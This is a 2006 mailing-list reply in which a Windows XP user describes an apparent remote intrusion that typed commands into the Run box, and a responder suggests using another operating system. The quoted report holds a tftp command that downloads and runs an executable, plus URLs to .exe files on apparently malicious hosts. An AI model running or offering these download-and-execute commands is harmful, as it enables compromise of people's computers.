On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC). I'm no expert, but a google search on wfudpgemr.exe resulted in the following hit: http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc

> Anybody know anything about any of these apparent attacks.

Not really, haven't been paying much attention.

> Any suggestions to prevent this particular exploit (START/Run)?

Perhaps a little extreme for most, but: run a different OS. MacOS isn't bad, I run Linux.

TTYL

--
http://www.piclist.com PIC/SX FAQ & list archive
View/change your membership options at
http://mailman.mit.edu/mailman/listinfo/piclist